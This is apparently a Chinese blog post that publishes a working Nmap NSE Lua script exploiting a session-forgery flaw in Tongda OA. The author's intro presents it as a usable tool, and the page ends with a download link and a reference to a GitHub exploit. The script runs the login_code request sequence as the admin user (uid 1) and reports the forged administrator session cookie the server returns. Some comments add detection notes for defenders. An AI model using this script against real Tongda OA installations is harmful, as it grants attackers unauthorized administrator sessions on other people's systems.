通达OA伪造SESSION | Nmap脚本

时间:2022-07-23
本文章向大家介绍通达OA伪造SESSION | Nmap脚本,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

通达OA又出问题了,这次的脚本是参照一个哥们儿github上代码写的,用了一晚上,我终于证明了一个问题,v2017版本和v11.x版本利用方式一毛一样,被这个爹给坑害了,画个圈圈诅咒他!

local stdnse = require "stdnse"
local shortport = require "shortport"
local http = require "http"
local json = require "json"

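--- NSE script metadata; these globals are read by Nmap's script engine.
-- `description` is what `nmap --script-help` prints, so it should say what the
-- script checks rather than a placeholder.
description = "Checks a Tongda OA instance for the login_code session-forgery weakness described in the referenced write-up"
author = "test94"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
-- The action below sends state-changing requests and reports a session cookie,
-- so the script is intrusive: it must not sit in "default" (which runs under
-- -sC without the operator selecting it). "vuln" + "intrusive" means it only
-- runs when explicitly requested by name or category.
categories = {"vuln", "intrusive"}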


--- Banner printed once before any host is scanned.
-- Writes four fixed lines via print and returns nothing; the banner text is
-- kept in a table so the lines are listed in one place.
prerule = function()
    local banner = {
        "-----------------------------------",
        "[+] start ... ",
        "[-] (if port is filtered, nothing will be checked)",
        "",
    }
    for _, line in ipairs(banner) do
        print(line)
    end
end

--- Port selection: run the action on ports whose detected service name is one
-- of the web-like names below (shortport.service builds the matcher).
local web_services = {"http", "https", "afs3-callback", "http-proxy"}
portrule = shortport.service(web_services)


--- Per-port check: walks the three-request login_code flow against the target
-- and reports the Set-Cookie header returned at the end, if any.
-- @param host Nmap host table
-- @param port Nmap port table
-- @return stdnse output table; `result` is "not vulnerable" unless the final
--   request returned a set-cookie header, in which case it holds that header.
-- Detection note for defenders: the distinguishing sequence from one client is
-- GET /ispirit/login_code.php, then POST /general/login_code_scan.php with
-- username=admin, then GET /ispirit/login_code_check.php?codeuid=... .
action = function(host, port)
    local output = stdnse.output_table()
    output.result = "not vulnerable"

    -- Browser-like headers reused on all three requests; `content` is the POST body.
    local options = {header = {}, content = {}}    
    options["header"]["Cache-Control"] = "max-age=0" 
    options["header"]["Upgrade-Insecure-Requests"] = "1" 
    options["header"]["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36 Edg/81.0.416.58" 
    options["header"]["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
    options["header"]["Accept-Encoding"] = "gzip, deflate" 
    options["header"]["Accept-Language"] = "zh-Hans-CN,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,en-GB;q=0.6,en-US;q=0.5" 
    -- options["header"]["Cookie"] = "USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=40cff017; PHPSESSID=1edafhs3br4q1ajb49q9a2u4a1; KEY_RANDOMDATA=8271"
    options["header"]["Connection"] = "close" 
    options["header"]["Content-Type"] = "application/x-www-form-urlencoded"
    
    -- Step 1: request a login code; the JSON body is expected to carry "codeuid".
    local req = http.generic_request(host, port, "GET", "/ispirit/login_code.php", options)
    local status, codeuid = json.parse(req.body)
    -- NOTE(review): `status` is never checked. If the body is not JSON or has no
    -- "codeuid" key, codeuid ends up nil and the concatenation below raises, so a
    -- non-OA or patched host produces a script error instead of "not vulnerable".
    codeuid = codeuid['codeuid']

    -- Step 2: confirm the code for uid 1 / username admin; the response JSON
    -- "status" field is compared as the string '1' (not the number 1).
    local postdatas = "codeuid="..codeuid.."&uid=1&source=pc&type=confirm&username=admin"
    options['content'] = postdatas
    local req2 = http.generic_request(host, port, "POST", "/general/login_code_scan.php", options)
    local status_TF, status_sta = json.parse(req2.body)
    -- NOTE(review): status_TF is likewise unchecked; a parse failure here also
    -- surfaces as an indexing error rather than a clean "not vulnerable".
    if status_sta['status'] == '1' then
        -- Step 3: a GET with the same codeuid; whatever the server sets as the
        -- session cookie is reported verbatim (nil if the header is absent).
        options['content'] = ""
        local req3 = http.generic_request(host, port, "GET", "/ispirit/login_code_check.php?codeuid="..codeuid, options)
        local fake_cookie = req3.header['set-cookie']
        output.result = fake_cookie
    end
    return output
end

下载地址:http://www.my-synology.cn:37980/sharing/e96EXxAHM


参考文章

https://github.com/NS-Sp4ce/TongDaOA-Fake-User